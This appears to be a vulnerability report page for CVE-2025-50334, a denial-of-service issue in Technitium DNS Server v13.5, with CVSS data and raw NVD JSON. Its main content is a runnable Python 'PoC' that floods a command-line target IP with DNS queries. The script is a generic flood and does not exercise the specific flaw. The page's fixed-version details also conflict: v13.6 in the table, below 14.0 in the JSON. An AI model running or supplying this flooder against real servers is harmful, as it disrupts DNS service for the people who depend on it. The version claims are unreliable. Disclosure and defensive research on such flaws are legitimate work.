Security Vulnerability Report
中文
CVE-2025-50334 CVSS 7.5 HIGH

CVE-2025-50334

Published: 2026-01-08 17:15:48
Last Modified: 2026-01-12 18:39:31
Source: [email protected]

Description

An issue in Technitium DNS Server v.13.5 allows a remote attacker to cause a denial of service via the rate-limiting component

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:technitium:dnsserver:*:*:*:*:*:*:*:* - VULNERABLE
Technitium DNS Server v13.5
Technitium DNS Server v13.3 (受影响版本,待确认)
Technitium DNS Server < v13.6 (修复版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket import time import random # CVE-2025-50334 PoC - Technitium DNS Server DoS via rate-limiting # Target: Technitium DNS Server v13.5 # Attack: Send crafted DNS queries to trigger rate-limiting DoS def create_dns_query(domain, qtype='A'): """Create a DNS query packet""" transaction_id = random.randint(0, 65535) # DNS Header header = bytes([ (transaction_id >> 8) & 0xFF, transaction_id & 0xFF, # Transaction ID 0x01, 0x00, # Flags: Standard query 0x00, 0x01, # Questions: 1 0x00, 0x00, # Answer RRs: 0 0x00, 0x00, # Authority RRs: 0 0x00, 0x00 # Additional RRs: 0 ]) # Encode domain name labels = domain.split('.') qname = b'' for label in labels: qname += bytes([len(label)]) + label.encode() qname += b'\x00' # Query type and class qtype_map = {'A': 1, 'AAAA': 28, 'TXT': 16, 'MX': 15} qtype_bytes = bytes([0x00, qtype_map.get(qtype, 1)]) qclass = bytes([0x00, 0x01]) # IN class return header + qname + qtype_bytes + qclass def exploit_cve_2025_50334(target_ip, target_port=53, duration=60): """ Exploit CVE-2025-50334 by sending rapid DNS queries to trigger rate-limiting component failure """ print(f"[*] Starting DoS attack on {target_ip}:{target_port}") print(f"[*] Target: Technitium DNS Server v13.5") print(f"[*] CVE: CVE-2025-50334") sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(1) domains = [ 'target1.example.com', 'target2.example.com', 'test.example.com', 'attacker.example.com', 'dns.example.com' ] start_time = time.time() request_count = 0 try: while time.time() - start_time < duration: for domain in domains: query = create_dns_query(domain, random.choice(['A', 'AAAA', 'TXT'])) try: sock.sendto(query, (target_ip, target_port)) request_count += 1 if request_count % 100 == 0: print(f"[*] Sent {request_count} requests...") except Exception as e: print(f"[!] Error: {e}") # Send rapid requests to trigger rate-limiting time.sleep(0.001) except KeyboardInterrupt: print("\n[!] Attack interrupted by user") finally: sock.close() print(f"\n[*] Attack completed. Total requests sent: {request_count}") print(f"[*] Duration: {time.time() - start_time:.2f} seconds") if __name__ == '__main__': import sys if len(sys.argv) < 2: print("Usage: python cve-2025-50334.py <target_ip> [port]") print("Example: python cve-2025-50334.py 192.168.1.100 53") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 53 exploit_cve_2025_50334(target, port, duration=60)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-50334", "sourceIdentifier": "[email protected]", "published": "2026-01-08T17:15:47.603", "lastModified": "2026-01-12T18:39:30.937", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in Technitium DNS Server v.13.5 allows a remote attacker to cause a denial of service via the rate-limiting component"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:technitium:dnsserver:*:*:*:*:*:*:*:*", "versionEndExcluding": "14.0", "matchCriteriaId": "92E46DA3-4482-409E-9910-C450D404581D"}]}]}], "references": [{"url": "http://technitium.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/FPokerFace/Security-Advisory/tree/main/CVE-2025-50334", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/TechnitiumSoftware/DnsServer/blob/master/CHANGELOG.md", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/TechnitiumSoftware/DnsServer/blob/v13.3/DnsServerCore/Dns/DnsServer.cs", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/TechnitiumSoftware/DnsServer/commit/7229b217238213cc6275eea68a7e17d73df1603e", "source": "[email protected]", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.